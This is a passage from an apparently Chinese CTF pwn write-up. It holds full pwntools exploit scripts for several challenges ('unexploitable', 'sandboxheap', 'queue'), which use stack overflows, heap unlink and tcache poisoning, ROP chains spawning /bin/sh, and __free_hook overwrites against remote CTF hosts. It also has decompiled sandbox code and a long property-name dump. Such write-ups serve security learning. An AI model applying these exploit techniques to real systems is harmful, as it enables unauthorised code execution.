new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p8(payload),b"c"*0x100)
# new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
elif offset == 0:
print("bbbb")
new_ctf(b"a"*0x148+p32(payload)[:3],b"c"*0x100)
else:
# new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x5,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x4,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x3,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x2,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x1,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3],b"c"*0x100)
pop_rdi = 0x0000000000404982
# 0
pop_rsi = 0x0000000000588bbe
# 0x81a2a0+0x400
pop_rdx = 0x000000000040454f
# 0x200
pop_rax = 0x00000000005bdb8a
#0
syscall = 0x000000000068f0a4
pop_rsp = 0x00000000005a350a
#0x81a2a0+0x400
# attach(sh)
send_payload(0x88,syscall)
send_payload(0x80,0x3b)
send_payload(0x78,pop_rax)
send_payload(0x70,0)
send_payload(0x68,pop_rdx)
send_payload(0x60,0)
send_payload(0x58,pop_rsi)
send_payload(0x50,0x81a2a0+0x400)
send_payload(0x48,pop_rdi)
send_payload(0x40,syscall)
send_payload(0x38,0)
send_payload(0x30,pop_rax)
send_payload(0x28,0x7)
send_payload(0x20,pop_rdx)
send_payload(0x18,0x81a2a0+0x400)
send_payload(0x10,pop_rsi)
send_payload(0x8,0)
send_payload(0,0)
send_payload(0,pop_rdi)
new_ctf()
sh.interactive()
"""
p = p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x00000000005bdb8a) # pop rax ; ret
p += b'/bin/sh;'
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000404982) # pop rdi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x000000000040454f) # pop rdx ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x0000000000403c99) # syscall
"""unexploitable
栈溢出,利用 VSDO 填第一个返回地址,然后部分覆盖 libc 的地址(第二个返回地址)为 one_gadget,需要 1/4096 爆破
from pwn import *
#context.log_level = "debug"
context.timeout = 10
while(1):
try:
sh = remote('47.95.3.91', 41632)
sh.send('a' * 0x18 + p64(0xffffffffff600400) * 2 + '\\x02\\xc3\\x4f')
sleep(0.1)
for i in range(3):
sh.sendline("cat flag")
sleep(0.1)
# sh.interactive()
data = sh.recv()
print(data)
if "flag" in data:
break
except Exception as e:
print(e)
sh.close()
sh.interactive()sandboxheap
菜单题套个调试器实现的沙箱
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
__pid_t v3; // eax
unsigned int v4; // ebx
unsigned __int64 orig_rax; // rax
int *v6; // rax
char *v7; // rax
struct user_regs_struct regs; // [rsp+0h] [rbp-108h] BYREF
unsigned __int64 v9; // [rsp+D8h] [rbp-30h]
v9 = __readfsqword(0x28u);
if ( a1 <= 1 )
{
__fprintf_chk(stderr, 1LL, "strace: too few arguments: %d", (unsigned int)a1);
}
else
{
v3 = fork();
v4 = v3;
if ( v3 != -1 )
{
if ( v3 )
{
waitpid(v3, 0LL, 0);
ptrace(PTRACE_SETOPTIONS, v4, 0LL, 0x100000LL);
do
{
if ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) == -1
|| waitpid(v4, 0LL, 0) == -1
|| ptrace(PTRACE_GETREGS, v4, 0LL, ®s) == -1 )
{
break;
}
if ( regs.orig_rax == 0x25 ) // alarm
set_map(1);
orig_rax = regs.orig_rax;
if ( LODWORD(regs.orig_rax) <= 0x2710 && regs_map[SLODWORD(regs.orig_rax)] )
{
regs.orig_rax = -1LL;
if ( ptrace(PTRACE_SETREGS, v4, 0LL, ®s) == -1 )
break;
orig_rax = regs.orig_rax;
}
switch ( orig_rax )
{
case 0xE7uLL:
goto LABEL_24;
case 0x2710uLL:
set_map(regs.rdi);
break;
case 0x3CuLL:
LABEL_24:
exit(regs.rdi);
}
}
while ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) != -1
&& waitpid(v4, 0LL, 0) != -1
&& (regs.orig_rax != 10000 && regs.orig_rax != -1LL || ptrace(PTRACE_POKEUSER, v4, 0x50LL) != -1) );
}
else
{
ptrace(PTRACE_TRACEME, 0LL, 0LL, 0LL);
execvp(a2[1], a2 + 1);
}
}
v6 = __errno_location();
v7 = strerror(*v6);
__fprintf_chk(stderr, 1LL, "strace: %s", v7);
}
fputc(10, stderr);
exit(1);
}set_map 设置一个 syscall_allow 数组
void __fastcall set_map(char a1)
{
memset(regs_map, 1, 0x2711uLL);
regs_map[3] = 0; // sys_close
*(_DWORD *)®s_map[9] = 0; // sys_mmap
regs_map[60] = 0; // sys_exit
regs_map[231] = 0; // sys_exit_group
if ( (a1 & 1) != 0 )
{
regs_map[40] = 0; // sys_sendfile64
*(_WORD *)regs_map = 0; // sys_read, sys_write
*(_DWORD *)®s_map[17] = 0; // sys_pread64, sys_pwrite64, sys_readv, sys_writev
*(_WORD *)®s_map[295] = 0; // sys_preadv, sys_pwritev
byte_204750 = 0;
}
if ( (a1 & 2) != 0 )
regs_map[2] = 0; // sys_open
}堆菜单用 ROP 调用 0x2710 使得调用打开,然后 ORW 就行了,堆菜单做法看 *bitheap* 这题
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
#sh = process(['./sandbox', './sandboxheap'])
sh = remote('39.106.13.71', 15670)
#sh = process(['./sandboxheap'])
def choice(idx):
sh.sendlineafter("choice: ", str(idx))
def add(idx, size):
choice(1)
sh.sendlineafter("Index: ", str(idx))
sh.sendlineafter("Size: ", str(size))
def edit(idx, content, tag=False):
choice(2)
sh.sendlineafter("Index: ", str(idx))
send_content = ""
for i in content:
send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
if tag:
send_content += '0'
sh.sendafter("Content: ", send_content)
def show(idx):
choice(3)
sh.sendlineafter("Index: ", str(idx))
def delete(idx):
choice(4)
sh.sendlineafter("Index: ", str(idx))
add(0, 0x88)
add(1, 0x88)
for i in range(2, 2 + 7):
add(i, 0x88)
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
for i in range(2, 2 + 7):
delete(i)
delete(0)
for i in range(2, 2 + 7):
add(i, 0x88)
add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x110
log.success("stack:\\t" + hex(stack))
delete(2)
delete(9)
edit(1, p64(stack - 0x18))
add(9, 0x88)
add(2, 0x88)
start_addr = stack - 0x18
rop_chain1 = flat([
pop_rdi_addr,
0,
pop_rsi_addr,
stack,
pop_rdx_addr,
0x200,
syscall_addr,
])
rop_chain2 = flat([
pop_rdi_addr,
3,
pop_rax_addr,
0x2710,
syscall_addr,
pop_rdi_addr,
start_addr,
pop_rsi_addr,
0,
pop_rax_addr, # sys_open('flag', 0)
2,
syscall_addr,
pop_rax_addr, # sys_read(flag_fd, heap, 0x100)
0,
pop_rdi_addr,
3,
pop_rsi_addr,
start_addr + 0x200,
pop_rdx_addr,
0x100,
syscall_addr,
pop_rax_addr, # sys_write(1, heap, 0x100)
1,
pop_rdi_addr,
1,
pop_rsi_addr,
start_addr + 0x200,
syscall_addr
])
#gdb.attach(sh, "b *$rebase(0x0000000000000E63)")
edit(2, 'flag'.ljust(0x18, '\\x00') + rop_chain1)
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)
sh.interactive()queue
666 为后门位置,可以通过这个来控制 queue 结构体,借此 leak libc 和修改 __free_hook 即可
from pwn import *
context.log_level = "debug"
#sh = process('./queue')
sh = remote('101.201.71.136', 12507)
def choice(idx):
sh.sendlineafter("Queue Management: ", str(idx))
def push(size):
choice(1)
sh.sendlineafter("Size: ", str(size))
def change(idx, value_idx, value):
choice(2)
sh.sendlineafter("Index: ", str(idx))
sh.sendlineafter("Value idx: ", str(value_idx))
sh.sendlineafter("Value: ", str(value))
def show(idx, num):
choice(3)
sh.sendlineafter("Index: ", str(idx))
sh.sendlineafter("Num: ", str(num))
def pop():
choice(4)
def delete(idx):
choice(4)
sh.sendlineafter("Index: ", str(idx))
def edit(idx, offset, data):
for x in data:
change(idx, offset, ord(x))
offset += 1
def backdoor(idx, content):
choice(666)
sh.sendlineafter("Index: ", str(idx))
sh.sendafter("Content: ", content)
def get_show(size):
data = ""
sh.recvuntil('Content: ')
for i in range(size):
data += chr(int(sh.recvline(), 16))
return data
push(0x100) # 0
push(0x100) # 1
edit(0, 0, '/bin/sh')
# edit(1, 0, 'b' * 0x100)
pop()
backdoor(0, 'a' * 8 + p64(0x1000) + '\\x00')
show(0, 0xc0)
leak_data = get_show(0xc0)
log.hexdump(leak_data)
heap_base = u64(leak_data[-8:]) - 0x126f0
log.success("heap_base:\\t" + hex(heap_base))
backdoor(0, p64(heap_base + 0x126a0) + p64(0x8) + '\\xf0')
push(0x100) #1
push(0x100) #2
push(0x100) #3
push(0x100) #4
pop() #4
pop() #3
pop() #2
pop() #1
fake_struct = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct += p64(heap_base + 0x13450) + p64(heap_base + 0x13450)
fake_struct += p64(heap_base + 0x13450 + 0x200) + p64(heap_base + 0x131b8)
fake_struct += p64(heap_base + 0x13450 + 0x100) + p64(heap_base + 0x13450)
backdoor(0, fake_struct)
show(0, 0x10)
libc_leak = get_show(0x10)
log.hexdump(libc_leak)
libc_base = u64(libc_leak[-8:]) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
free_hook_addr = libc_base + 0x3ed8e8
system_addr = libc_base + 0x4f420
bin_sh_addr = libc_base + 0x1b3d88
fake_struct2 = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct2 += p64(free_hook_addr) + p64(free_hook_addr)
fake_struct2 += p64(free_hook_addr + 0x200) + p64(heap_base + 0x131b8)
fake_struct2 += p64(free_hook_addr + 0x100) + p64(free_hook_addr)
backdoor(0, fake_struct2)
edit(0, 0, p64(system_addr))
#gdb.attach(sh, "b free")
pop()
sh.interactive()ojs
根据字符串内容找到项目地址:https://github.com/ndreynolds/flathead
编译一份源码,然后用 gdb dprintf 来调试程序,输出所有的 prop ,然后编写程序进行比对
a = '''prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charTo
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
